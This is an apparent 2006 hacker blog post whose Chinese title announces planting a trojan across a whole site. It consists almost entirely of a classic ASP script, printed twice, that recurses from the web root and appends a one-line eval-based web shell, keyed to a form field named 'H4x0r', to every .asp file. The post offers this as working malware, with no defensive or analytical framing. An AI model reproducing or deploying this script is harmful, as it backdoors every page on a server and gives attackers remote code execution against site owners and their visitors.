2006-09-23 17:33:52 by: h4x0r
FSO遍历目录实现全站插马
<%
dim ph
dim intfile
server.ScriptTimeout = 600
ph=server.mappath("/")
Sub InsertAllFiles(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = FSO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If lcase(FSO.GetExtensionName(path&""&myfile.name))="asp" then
Set FS1 = CreateObject("Scripting.FileSystemObject")
Set tfile=FS1.opentextfile(path&""&myfile.name,8,false)
tfile.writeline "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('H4x0r')+'')</SCRIPT>"
else
InsertAllFiles(newpath)
end if
tfile.close
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
newpath=path&""&f1.name
InsertAllFiles(newpath)
Next
set tfile=nothing
Set FSO = Nothing
End Sub
%>
<%
call InsertAllFiles(ph)
%>
dim ph
dim intfile
server.ScriptTimeout = 600
ph=server.mappath("/")
Sub InsertAllFiles(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = FSO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If lcase(FSO.GetExtensionName(path&""&myfile.name))="asp" then
Set FS1 = CreateObject("Scripting.FileSystemObject")
Set tfile=FS1.opentextfile(path&""&myfile.name,8,false)
tfile.writeline "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('H4x0r')+'')</SCRIPT>"
else
InsertAllFiles(newpath)
end if
tfile.close
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
newpath=path&""&f1.name
InsertAllFiles(newpath)
Next
set tfile=nothing
Set FSO = Nothing
End Sub
%>
<%
call InsertAllFiles(ph)
%>
[Last Modified By h4x0r, at 2006-09-23 17:35:03]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=756
國慶快樂